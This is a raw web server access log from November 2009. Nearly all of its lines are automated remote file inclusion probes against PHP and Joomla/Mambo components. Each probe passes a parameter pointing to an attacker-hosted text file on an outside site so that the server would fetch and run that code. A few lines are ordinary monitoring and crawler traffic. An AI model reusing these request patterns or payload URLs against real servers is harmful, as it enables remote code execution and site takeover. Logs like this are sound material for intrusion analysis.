174.142.75.77 - - [26/Nov/2009:04:59:26 -0500] "GET /logs/access_log.Q109062800%20%20//modules/vwar/admin/admin.php?vwar_root=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:04:59:30 -0500] "GET /logs/error_log.Q109060800%20%20//modules/vwar/admin/admin.php?vwar_root=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:04:59:45 -0500] "GET /logs/error_log.Q109060800%20%20//modules/vwar/admin/admin.php?vwar_root=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:00:00 -0500] "GET /logs/access_log.Q109062800%20%20//modules/vwar/admin/admin.php?vwar_root=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:00:14 -0500] "GET /logs/error_log.Q109060800%20%20//modules/vwar/admin/admin.php?vwar_root=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
70.38.64.117 - - [26/Nov/2009:05:00:21 -0500] "GET /logs/access_log.Q109052300/?sourcedir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
70.38.64.117 - - [26/Nov/2009:05:00:21 -0500] "GET /?sourcedir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
70.38.64.117 - - [26/Nov/2009:05:00:21 -0500] "GET /logs/?sourcedir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 200 27548 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:00:27 -0500] "GET /?sourcedir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:00:27 -0500] "GET /logs/?sourcedir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 27548 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:00:52 -0500] "GET /?sourcedir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:00:52 -0500] "GET /logs/?sourcedir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 27548 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:05:00:53 -0500] "GET //component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:05:00:53 -0500] "GET /logs//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:05:00:53 -0500] "GET /logs/access_log.Q109051200//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
70.38.64.117 - - [26/Nov/2009:05:01:05 -0500] "GET /logs/access_log.Q109052300/?sourcedir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
70.38.64.117 - - [26/Nov/2009:05:01:05 -0500] "GET /?sourcedir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
70.38.64.117 - - [26/Nov/2009:05:01:05 -0500] "GET /logs/?sourcedir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 200 24029 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:05:01:11 -0500] "GET /logs/error_log.Q109101900//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:01:14 -0500] "GET /logs/access_log.Q109062800//modules/vwar/admin/admin.php?vwar_root=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
93.187.234.206 - - [26/Nov/2009:05:01:48 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.jacrafts.com/images/discounts/rhs/pid.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
93.187.234.206 - - [26/Nov/2009:05:01:48 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.jacrafts.com/images/discounts/rhs/pid.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:01:49 -0500] "GET /logs/access_log.Q109053000//modules/vwar/admin/admin.php?vwar_root=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:01:56 -0500] "GET /logs/access_log.Q109062800//modules/vwar/admin/admin.php?vwar_root=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:05:02:23 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.199.140.158 - - [26/Nov/2009:05:04:31 -0500] "GET /logs/access_log.Q109051200//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:05:04:31 -0500] "GET /logs//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:05:04:31 -0500] "GET //component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:04:40 -0500] "GET /logs/error_log.Q109060800//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
122.199.140.158 - - [26/Nov/2009:05:04:46 -0500] "GET /logs/error_log.Q109101900//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:04:59 -0500] "GET /logs/error_log.Q109060800//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.94.118.197 - - [26/Nov/2009:05:05:36 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:05:49 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:05:49 -0500] "GET /logs/error_log.Q109101800/lostpasswd.php?env[include_prefix]=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:05:49 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:06:02 -0500] "GET /logs/error_log.Q109060800//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:06:11 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:06:11 -0500] "GET /logs/error_log.Q109101800%20%20/lostpasswd.php?env[include_prefix]=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:06:12 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
81.84.153.44 - - [26/Nov/2009:05:06:13 -0500] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.1.4322; InfoPath.2)"
81.84.153.44 - - [26/Nov/2009:05:06:22 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.1.4322; InfoPath.2)"
174.142.75.77 - - [26/Nov/2009:05:06:26 -0500] "GET /logs/error_log.Q109100300//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:06:58 -0500] "GET /logs/error_log.Q109060800//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:07:05 -0500] "GET /logs/error_log.Q109072400%20%20/lostpasswd.php?env[include_prefix]=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:07:11 -0500] "GET /logs/access_log.Q109062800//modules/vwar/admin/admin.php?vwar_root=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:05:07:23 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.7.179.100 - - [26/Nov/2009:05:07:41 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:07:41 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:07:41 -0500] "GET /logs/error_log.Q109101800/lostpasswd.php?env[include_prefix]=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:07:56 -0500] "GET /logs/access_log.Q109062800//modules/vwar/admin/admin.php?vwar_root=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:08:08 -0500] "GET /logs/access_log.Q109082900%20%20//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:08:08 -0500] "GET //atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:08:08 -0500] "GET /logs//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:08:12 -0500] "GET //atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:08:12 -0500] "GET /logs//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:08:12 -0500] "GET /logs/access_log.Q109082900%20%20//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:08:12 -0500] "GET /logs/access_log.Q109091100%20%20//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:08:13 -0500] "GET /logs/access_log.Q109091100%20%20//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:08:43 -0500] "GET /logs/error_log.Q109072400/lostpasswd.php?env[include_prefix]=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:08:59 -0500] "GET /logs/error_log.Q109060800//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:09:32 -0500] "GET /logs/access_log.Q109070500/lostpasswd.php?env[include_prefix]=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:09:56 -0500] "GET /logs/access_log.Q109082900%20%20//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:09:56 -0500] "GET /logs//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:09:56 -0500] "GET //atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:09:57 -0500] "GET /logs/access_log.Q109091100%20%20//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
117.74.98.18 - - [26/Nov/2009:05:10:37 -0500] "GET /logs//login.php?dir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
117.74.98.18 - - [26/Nov/2009:05:10:37 -0500] "GET /logs/access_log.Q109091100%20%20//login.php?dir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
117.74.98.18 - - [26/Nov/2009:05:10:38 -0500] "GET //login.php?dir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
117.74.98.18 - - [26/Nov/2009:05:10:55 -0500] "GET /logs/error_log.Q109110500%20%20//login.php?dir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
78.110.50.132 - - [26/Nov/2009:05:11:00 -0500] "GET /logs//playing.php/common/db.php?commonpath=http://www.hitradio1.com/stem1458/imsid.txt%0D?? HTTP/1.1" 404 229 "-" "libwww-perl/5.831"
78.110.50.132 - - [26/Nov/2009:05:11:00 -0500] "GET //playing.php/common/db.php?commonpath=http://www.hitradio1.com/stem1458/imsid.txt%0D?? HTTP/1.1" 404 224 "-" "libwww-perl/5.831"
78.110.50.132 - - [26/Nov/2009:05:11:01 -0500] "GET /logs/access_log.Q109070500//playing.php/common/db.php?commonpath=http://www.hitradio1.com/stem1458/imsid.txt%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.831"
78.110.50.132 - - [26/Nov/2009:05:11:10 -0500] "GET /logs/access_log.Q109050800//playing.php/common/db.php?commonpath=http://www.hitradio1.com/stem1458/imsid.txt%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.831"
222.122.72.246 - - [26/Nov/2009:05:11:10 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.122.72.246 - - [26/Nov/2009:05:11:10 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.122.72.246 - - [26/Nov/2009:05:11:10 -0500] "GET /logs/access_log.Q109092200//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:12:11 -0500] "GET /logs//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:12:11 -0500] "GET //atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:12:11 -0500] "GET /logs/access_log.Q109082900%20%20//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:05:12:23 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.233.89.196 - - [26/Nov/2009:05:12:28 -0500] "GET //atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:12:28 -0500] "GET /logs//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:12:28 -0500] "GET /logs/access_log.Q109092500//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:12:28 -0500] "GET /logs/error_log.Q109071000//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:12:29 -0500] "GET //atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:12:29 -0500] "GET /logs/error_log.Q109071000//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:12:29 -0500] "GET /logs/access_log.Q109092500//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:12:29 -0500] "GET /logs//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:12:53 -0500] "GET /logs/access_log.Q109091100%20%20//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:12:58 -0500] "GET /logs/error_log.Q109082400//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:13:05 -0500] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:13:05 -0500] "GET /logs/error_log.Q109070600//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:13:05 -0500] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:13:07 -0500] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
117.74.98.18 - - [26/Nov/2009:05:13:11 -0500] "GET //login.php?dir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
117.74.98.18 - - [26/Nov/2009:05:13:11 -0500] "GET /logs//login.php?dir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
117.74.98.18 - - [26/Nov/2009:05:13:11 -0500] "GET /logs/error_log.Q109052200//login.php?dir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
118.220.173.228 - - [26/Nov/2009:05:13:13 -0500] "GET //include/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
118.220.173.228 - - [26/Nov/2009:05:13:13 -0500] "GET /logs/access_log.Q109093000//include/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
118.220.173.228 - - [26/Nov/2009:05:13:13 -0500] "GET /logs//include/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:13:13 -0500] "GET /logs/error_log.Q109082400//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:13:13 -0500] "GET /logs/error_log.Q109070600//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
118.220.173.228 - - [26/Nov/2009:05:13:13 -0500] "GET //include/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
118.220.173.228 - - [26/Nov/2009:05:13:13 -0500] "GET /logs//include/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
118.220.173.228 - - [26/Nov/2009:05:13:13 -0500] "GET /logs/access_log.Q109093000//include/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
58.120.226.112 - - [26/Nov/2009:05:13:30 -0500] "GET /logs//login.php?dir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.120.226.112 - - [26/Nov/2009:05:13:30 -0500] "GET //login.php?dir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
58.120.226.112 - - [26/Nov/2009:05:13:30 -0500] "GET /logs/error_log.Q109052200//login.php?dir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
118.220.173.228 - - [26/Nov/2009:05:13:34 -0500] "GET /logs//include/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
118.220.173.228 - - [26/Nov/2009:05:13:34 -0500] "GET //include/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
118.220.173.228 - - [26/Nov/2009:05:13:34 -0500] "GET /logs/access_log.Q109093000%20%20//include/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
118.220.173.228 - - [26/Nov/2009:05:13:34 -0500] "GET /logs/access_log.Q109093000%20%20//include/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
118.220.173.228 - - [26/Nov/2009:05:13:34 -0500] "GET //include/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
118.220.173.228 - - [26/Nov/2009:05:13:34 -0500] "GET /logs//include/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:13:59 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:13:59 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.195.114.54 - - [26/Nov/2009:05:13:27 -0500] "GET /logs/error_log.Q109100600 HTTP/1.0" 200 4163007 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.11.145.8 - - [26/Nov/2009:05:14:01 -0500] "GET /logs/access_log.Q109102900//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:14:02 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:14:02 -0500] "GET /logs/access_log.Q109102900//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
117.74.98.18 - - [26/Nov/2009:05:14:03 -0500] "GET /logs/access_log.Q109052400//login.php?dir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:14:05 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:14:16 -0500] "GET /logs/access_log.Q109070500%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.120.226.112 - - [26/Nov/2009:05:14:21 -0500] "GET /logs/access_log.Q109052400//login.php?dir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:14:27 -0500] "GET /logs/access_log.Q109051700//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.7.173.20 - - [26/Nov/2009:05:14:35 -0500] "GET //playing.php/common/db.php?commonpath=http://www.hitradio1.com/stem1458/imsid.txt%0D?? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
216.7.173.20 - - [26/Nov/2009:05:14:35 -0500] "GET /logs//playing.php/common/db.php?commonpath=http://www.hitradio1.com/stem1458/imsid.txt%0D?? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
216.7.173.20 - - [26/Nov/2009:05:14:35 -0500] "GET /logs/access_log.Q109070500//playing.php/common/db.php?commonpath=http://www.hitradio1.com/stem1458/imsid.txt%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
216.7.173.20 - - [26/Nov/2009:05:14:44 -0500] "GET /logs/access_log.Q109050800//playing.php/common/db.php?commonpath=http://www.hitradio1.com/stem1458/imsid.txt%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
222.122.72.246 - - [26/Nov/2009:05:14:44 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.122.72.246 - - [26/Nov/2009:05:14:44 -0500] "GET /logs/access_log.Q109081500//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.122.72.246 - - [26/Nov/2009:05:14:44 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:14:45 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:14:45 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
